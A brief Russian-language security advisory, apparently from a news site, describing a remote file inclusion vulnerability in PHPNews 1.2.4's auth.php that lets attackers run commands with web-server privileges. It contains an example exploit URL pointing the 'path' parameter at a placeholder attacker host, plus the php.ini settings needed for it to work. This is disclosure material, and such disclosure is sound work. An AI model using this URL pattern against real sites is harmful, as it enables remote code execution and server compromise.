Программа: PHPNews 1.2.4

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на уязвимой системе. Уязвимость
существует в сценарии 'auth.php' из-за
некорректной обработки входных данных в
некоторых переменных. Злоумышленник может
с помощью специально сформированного URL
выполнить произвольные команды на уязвимой
системе с привилегиями web сервера.

Пример:

http://[target]/[dir]/auth.php?path=http://[attacker]/

Для удачной эксплуатации уязвимости
register_globals и allow_url_fopen должны быть включены в
конфигурационном файле php.ini.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии